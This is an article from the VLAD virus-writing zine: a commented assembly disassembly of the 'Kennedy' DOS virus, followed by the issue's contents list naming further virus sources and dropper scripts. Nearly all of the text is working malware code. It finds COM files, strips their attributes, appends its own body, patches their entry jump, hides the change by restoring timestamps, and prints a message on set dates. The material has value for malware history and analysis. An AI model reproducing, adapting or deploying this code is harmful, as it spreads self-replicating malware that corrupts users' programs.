Virus Labs & Distribution
VLAD #2 - Kennedy Disasm

;                D     A     R     K     M     A     N
;                           Proudly Presents
;             D I S A S S E M B L Y   O F   K E N N E D Y

kennedy      segment
             assume  cs:kennedy,ds:kennedy
             org     100h                ; Origin of COM-file

jumpinst     db     0e9h,0ch,00h         ; Jump to viruscode
             int     20h                 ; Exit to DOS!
virusname    db      'Kennedy'
             call    kennedycode
             pop     si                  ; Load SI from stack
             sub     si,10fh             ; SI = delta offset
             mov     bp,[si+offset jumpadr-3]
             mov     ah,2ah              ; Get system date
             int     21h                 ; Do it!
             cmp     dx,606h             ; 6th July?
             jz      announce            ; Yes? Jump to announce
             cmp     dx,0b12h            ; 18th December?
             jz      announce            ; Yes? Jump to announce
             cmp     dx,0b16h            ; 22th December?
             jz      announce            ; Yes? Jump to announce
             lea     dx,[si+filespec-3]  ; DX = offset of filespec
             xor     cx,cx               ; Clear CX
             mov     ah,4eh              ; Find first matching file
             int     21h                 ; Do it!
             jb      virusexit           ; Error? Jump to virusexit
             call    checkfile
             jb      virusexit           ; Error? Jump to virusexit
             mov     ah,4fh              ; Find next matching file
             jmp     findnext
             mov     ax,bp
             add     ax,103h             ; AX = offset of real code
             jmp     ax                  ; Jump to the real code
             lea     dx,[si+announcement-3]
             mov     ah,09h              ; Standard output string
             int     21h                 ; Do it!
             jmp     virusexit
             mov     ax,4300h            ; Get file attributes
             mov     dx,9eh              ; DX = offset of filname in DTA
             int     21h                 ; Do it!
             mov     [si+offset fileinfo],cx
             mov     ax,4301h            ; Set file attributes
             xor     cx,cx               ; Clear CX
             int     21h                 ; Do it!
             mov     ax,3d02h            ; Open file (read/write file)
             int     21h                 ; Do it!
             mov     bx,ax
             mov     ah,3fh              ; Read from file
             lea     dx,[si+offset fileinfo-3]
             mov     di,dx
             mov     cx,03h              ; Read 3 bytes
             int     21h                 ; Do it!
             cmp     byte ptr [di],0e9h  ; First instruction jump?
             jz      infectfile          ; Yes? Jump to infectfile
             call    setfileattr
             clc                        ; Clear carry flag
             ret                         ; Return!
             mov     dx,[di+01h]
             mov     [si+offset jumpadr-3],dx
             xor     cx,cx               ; Clear CX
             mov     ax,4200h            ; Move file pointer from beginning
             int     21h                 ; Do it!
             mov     dx,di
             mov     cx,02h              ; Read 2 bytes
             mov     ah,3fh              ; Read from file
             int     21h                 ; Do it!
             cmp     [di],6465h          ; Already infected?
             jz      restoreattr         ; Yes? Jump to restoreattr
             xor     dx,dx               ; Clear DX
             xor     cx,cx               ; Clear CX
             mov     ax,4202h            ; Move file pointer from end
             int     21h                 ; Do it!
             cmp     dx,00h              ; DX = 0? (Filesize = 0)
             jnz     restoreattr         ; Not equal? Jump to restoreattr
             cmp     ax,0fde8h           ; AX = 65000? (Filesize >= 65000)
             jnb     restoreattr         ; Greater or equal? Jump restoreattr
             add     ax,04h              ; AX = AX + 4
             mov     [si+offset fileinfo+6],ax
             mov     ax,5700h            ; Get file date and time
             int     21h                 ; Do it!
             mov     [si+offset fileinfo+2],cx
             mov     [si+offset fileinfo+4],dx
             mov     ah,40h              ; Write to file
             lea     dx,[si+virusname-3]
             mov     cx,14dh             ; Write 333 bytes
             int     21h                 ; Do it!
             jb      restoredate         ; Error? Jump to restoredate
             mov     ax,4200h            ; Move file pointer from beginning
             xor     cx,cx               ; Clear CX
             mov     dx,01h              ; Move file pointer to second byte
             int     21h                 ; Do it!
             mov     ah,40h              ; Write to file
             lea     dx,[si+offset fileinfo+6]
             mov     cx,02h              ; Write 2 bytes
             int     21h                 ; Do it!
             mov     cx,[si+offset fileinfo+2]
             mov     dx,[si+offset fileinfo+4]
             mov     ax,5701h            ; Set file date and time
             int     21h                 ; Do it!
             mov     ah,3eh              ; Close file
             int     21h                 ; Do it!
             call    setfileattr
             stc                         ; Set carry flag
             ret                         ; Return!
             mov     ax,4301h            ; Set file attributes
             mov     cx,[si+offset fileinfo]
             int     21h                 ; Do it!
             ret                         ; Return!

realcodeoff  db      03h,00h             ; Offset of the real code
filespec     db      '*.COM',00h         ; Filespecification
commandpath  db      '\COMMAND.COM',00h  ; Path of COMMAND.COM
announcement db      'Kennedy er d›d - ' ; This announcement will be
             db      'l‘nge leve "The '  ; typed on the screen, if the
             db      'Dead Kennedys"'    ; virus is activated at one of the
             db      0dh,0ah,'$'         ; activation dates
fileinfo     db      43 dup(?)           ; Information about infected file
                                         ; and the soon infected file!!!

kennedy      ends
end          code


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ARTICLE.1_7       Coding the Mag


The Press
ARTICLE.2_2       Leprechaun Interview
ARTICLE.2_3       Flash Bios
ARTICLE.2_4       AMI Flash Specification
ARTICLE.2_5       Assembly Guide
ARTICLE.2_6       Virus Law
ARTICLE.2_7       Feedback


ARTICLE.3_2       TSR Tutorial
ARTICLE.3_5       Kennedy Disasm
ARTICLE.3_6       Darth Vader Strain B Disasm
ARTICLE.3_7       Gergana.222 Disasm


Virus Descriptions
ARTICLE.4_2       VLAD Virus Source
ARTICLE.4_3       Republic Source
ARTICLE.4_4       BIOS Meningitis Source
ARTICLE.4_5       Prodigy 3 Source
ARTICLE.4_6       Estonia Source
ARTICLE.4_7       What's Next


About Debug Scripts
ARTICLE.5_2       VLAD Script
ARTICLE.5_3       Republic Script
ARTICLE.5_4       BIOS Meningitis Dropper Script
ARTICLE.5_5       Prodigy 3 Script
ARTICLE.5_6       Estonia Script
ARTICLE.5_7       The End

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